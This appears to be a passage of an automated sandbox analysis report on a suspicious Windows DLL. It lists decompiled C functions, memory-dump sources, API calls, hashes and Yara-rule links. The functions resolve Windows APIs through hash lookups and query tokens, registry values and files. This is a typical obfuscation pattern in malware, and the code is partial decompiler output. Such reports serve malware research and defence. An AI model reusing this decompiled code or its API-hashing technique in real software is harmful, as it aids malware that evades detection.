                                                                                                                                                  0x6e9b11d4
                                                                                                                                                  0x6e9b11d8
                                                                                                                                                  0x6e9b1227
                                                                                                                                                  0x6e9b11da
                                                                                                                                                  0x6e9b11df
                                                                                                                                                  0x6e9b1222
                                                                                                                                                  0x6e9b11e1
                                                                                                                                                  0x6e9b11e6
                                                                                                                                                  0x6e9b121d
                                                                                                                                                  0x6e9b11e8
                                                                                                                                                  0x6e9b11ed
                                                                                                                                                  0x6e9b1218
                                                                                                                                                  0x6e9b11ef
                                                                                                                                                  0x6e9b11f4
                                                                                                                                                  0x6e9b1213
                                                                                                                                                  0x6e9b11f6
                                                                                                                                                  0x6e9b11fb
                                                                                                                                                  0x6e9b120e
                                                                                                                                                  0x6e9b11fd
                                                                                                                                                  0x6e9b11ff
                                                                                                                                                  0x6e9b1207
                                                                                                                                                  0x6e9b1207
                                                                                                                                                  0x6e9b11fb
                                                                                                                                                  0x6e9b11f4
                                                                                                                                                  0x6e9b11ed
                                                                                                                                                  0x6e9b11e6
                                                                                                                                                  0x6e9b11df
                                                                                                                                                  0x6e9b122c
                                                                                                                                                  0x6e9b1236
                                                                                                                                                  0x6e9b123b
                                                                                                                                                  0x6e9b123b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1240
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1120

                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E9B1118
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E9B117B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                  • Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                                                                  • Instruction ID: a565ea6416d2dc1b127dfde209d7e55ed2d91713b310478784b6b1c94f15b4e3
                                                                                                                                                  • Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                                                                  • Instruction Fuzzy Hash: EF410470644242ABEB15D9EEDC24BAF76EC9FD3704F208828FA50CA194DB70C849CF95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B57B4, Relevance: 3.1, APIs: 2, Instructions: 74registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E6E9B57B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E9B3064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E9AF828(_a8, _t15);
							if(E6E9B3064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E9AF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}











                                                                                                                                                  0x6e9b57b8
                                                                                                                                                  0x6e9b57b9
                                                                                                                                                  0x6e9b57bb
                                                                                                                                                  0x6e9b57c0
                                                                                                                                                  0x6e9b57c7
                                                                                                                                                  0x6e9b57cb
                                                                                                                                                  0x6e9b57cb
                                                                                                                                                  0x6e9b57cb
                                                                                                                                                  0x6e9b57cf
                                                                                                                                                  0x6e9b5815
                                                                                                                                                  0x6e9b5815
                                                                                                                                                  0x6e9b57d1
                                                                                                                                                  0x6e9b57d1
                                                                                                                                                  0x6e9b57d7
                                                                                                                                                  0x6e9b57e0
                                                                                                                                                  0x6e9b57e3
                                                                                                                                                  0x6e9b57fa
                                                                                                                                                  0x6e9b580b
                                                                                                                                                  0x6e9b580b
                                                                                                                                                  0x6e9b580d
                                                                                                                                                  0x6e9b5813
                                                                                                                                                  0x6e9b581e
                                                                                                                                                  0x6e9b5836
                                                                                                                                                  0x6e9b5856
                                                                                                                                                  0x6e9b5856
                                                                                                                                                  0x6e9b5858
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b57d7
                                                                                                                                                  0x6e9b5860

                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,6E9BD1F8,00000000,?,00000000,00000000,?,?,?,6E9BD1F8,?,6E9B5887,?,00000000,00000000), ref: 6E9B580B
                                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,6E9BD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E9BD1F8,?,6E9B5887,?,00000000), ref: 6E9B5856
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                  • Opcode ID: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                                                                  • Instruction ID: 40cefc674748089374ede031256924050a70919daff6026f3022636076e89f4d
                                                                                                                                                  • Opcode Fuzzy Hash: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                                                                  • Instruction Fuzzy Hash: 7C11A27020D305ABD750DAA5EC90EABBBDDEF45754F00881DB59487141EB31E800CF61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5B3C, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E6E9B5B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E9AD1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E9AD6D0(__ecx, _t60);
					E6E9ACFF8(_t56,  *_t60);
					E6E9ACFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E9B62B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E9AC26C(_t40);
					if(E6E9AC280(_t40) != 0) {
						_t56[2] = E6E9B35F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E9B3064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E9B3698(_t59, 0xff, 8);
						if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}















                                                                                                                                                  0x6e9b5b43
                                                                                                                                                  0x6e9b5b45
                                                                                                                                                  0x6e9b5b52
                                                                                                                                                  0x6e9b5b56
                                                                                                                                                  0x6e9b5b5a
                                                                                                                                                  0x6e9b5b64
                                                                                                                                                  0x6e9b5b6b
                                                                                                                                                  0x6e9b5b6b
                                                                                                                                                  0x6e9b5b72
                                                                                                                                                  0x6e9b5b74
                                                                                                                                                  0x6e9b5b79
                                                                                                                                                  0x6e9b5b82
                                                                                                                                                  0x6e9b5b8a
                                                                                                                                                  0x6e9b5b8a
                                                                                                                                                  0x6e9b5b7b
                                                                                                                                                  0x6e9b5b7d
                                                                                                                                                  0x6e9b5b7d
                                                                                                                                                  0x6e9b5b79
                                                                                                                                                  0x6e9b5b8f
                                                                                                                                                  0x6e9b5b9b
                                                                                                                                                  0x6e9b5ccc
                                                                                                                                                  0x6e9b5c09
                                                                                                                                                  0x6e9b5c12
                                                                                                                                                  0x6e9b5c13
                                                                                                                                                  0x6e9b5c18
                                                                                                                                                  0x6e9b5c19
                                                                                                                                                  0x6e9b5c0b
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c2f
                                                                                                                                                  0x6e9b5c43
                                                                                                                                                  0x6e9b5c31
                                                                                                                                                  0x6e9b5c3e
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c45
                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cae
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5ba1
                                                                                                                                                  0x6e9b5bb1
                                                                                                                                                  0x6e9b5bb1

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 098d50a50726e11323e3b69eece24cf5d9e57dfae2ceeb03cbcd324d8e17a096
                                                                                                                                                  • Instruction ID: 0594d4adba43bdef2dab1203b5f5a2585654248634b25672f0789a4952a3db8c
                                                                                                                                                  • Opcode Fuzzy Hash: 098d50a50726e11323e3b69eece24cf5d9e57dfae2ceeb03cbcd324d8e17a096
                                                                                                                                                  • Instruction Fuzzy Hash: 52310430284309BFEB516AF98D89F6B769FDFD1648F004C38FA419A185DE71D804CE61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5BBD, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E6E9B5BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E9AC26C(_t24);
				if(E6E9AC280(_t24) != 0) {
					_t34[2] = E6E9B35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E9B3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E9B3698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}
















                                                                                                                                                  0x6e9b5bbd
                                                                                                                                                  0x6e9b5bc1
                                                                                                                                                  0x6e9b5bc4
                                                                                                                                                  0x6e9b5bc7
                                                                                                                                                  0x6e9b5c09
                                                                                                                                                  0x6e9b5c12
                                                                                                                                                  0x6e9b5c18
                                                                                                                                                  0x6e9b5c19
                                                                                                                                                  0x6e9b5c0b
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c2f
                                                                                                                                                  0x6e9b5c43
                                                                                                                                                  0x6e9b5c31
                                                                                                                                                  0x6e9b5c3e
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c45
                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x6e9b5cc6
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c72
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c9a

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                                                                  • Instruction ID: 4f1b675ceec01bb9387b7bc3e9716c384e7cd3361713cef68be25982740e5ae7
                                                                                                                                                  • Opcode Fuzzy Hash: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                                                                  • Instruction Fuzzy Hash: F801223128030ABBFB5166E98C09F7B738FCFC2658F008835BA01A9185DA32E8558920
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5BE5, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E6E9B5BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E9AC26C(_t24);
					if(E6E9AC280(_t24) != 0) {
						_t33[2] = E6E9B35F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E9B3064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E9B3698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}















                                                                                                                                                  0x6e9b5be5
                                                                                                                                                  0x6e9b5be7
                                                                                                                                                  0x6e9b5bfe
                                                                                                                                                  0x6e9b5c09
                                                                                                                                                  0x6e9b5c12
                                                                                                                                                  0x6e9b5c18
                                                                                                                                                  0x6e9b5c19
                                                                                                                                                  0x6e9b5c0b
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c2f
                                                                                                                                                  0x6e9b5c43
                                                                                                                                                  0x6e9b5c31
                                                                                                                                                  0x6e9b5c3e
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c45
                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x6e9b5cc6
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c72
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5be9
                                                                                                                                                  0x6e9b5be9
                                                                                                                                                  0x6e9b5bf0
                                                                                                                                                  0x6e9b5bf0
                                                                                                                                                  0x6e9b5c9a

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                                                                  • Instruction ID: 1aae744b006aea8d2494b2c9a5ec4e0ea9e5fbb0877b0a263235d52aa372c4e3
                                                                                                                                                  • Opcode Fuzzy Hash: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                                                                  • Instruction Fuzzy Hash: 9001263068420ABAF7915AF5CC49F6B774FDFC2648F008C35BA0195189DB72E858CA20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5BD1, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E6E9B5BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E9AC26C(_t24);
				if(E6E9AC280(_t24) != 0) {
					_t34[2] = E6E9B35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E9B3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E9B3698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}














                                                                                                                                                  0x6e9b5bd1
                                                                                                                                                  0x6e9b5bd8
                                                                                                                                                  0x6e9b5bdb
                                                                                                                                                  0x6e9b5c09
                                                                                                                                                  0x6e9b5c12
                                                                                                                                                  0x6e9b5c18
                                                                                                                                                  0x6e9b5c19
                                                                                                                                                  0x6e9b5c0b
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c2f
                                                                                                                                                  0x6e9b5c43
                                                                                                                                                  0x6e9b5c31
                                                                                                                                                  0x6e9b5c3e
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c45
                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x6e9b5cc6
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c72
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c9a

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                                                                  • Instruction ID: 510c5993851073c7f9c676808a77fe4618c6a8fe2894b04da95846a67da4d0ae
                                                                                                                                                  • Opcode Fuzzy Hash: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                                                                  • Instruction Fuzzy Hash: 0901283568020ABBF751A6F58D45F7B724FDFD2658F008835FA01951C9DE32E859CA21
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5BB3, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                  			E6E9B5BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E9AC26C(_t23);
				if(E6E9AC280(_t23) != 0) {
					_t31[2] = E6E9B35F0(0x100);
					_t11 = 0;
				} else {
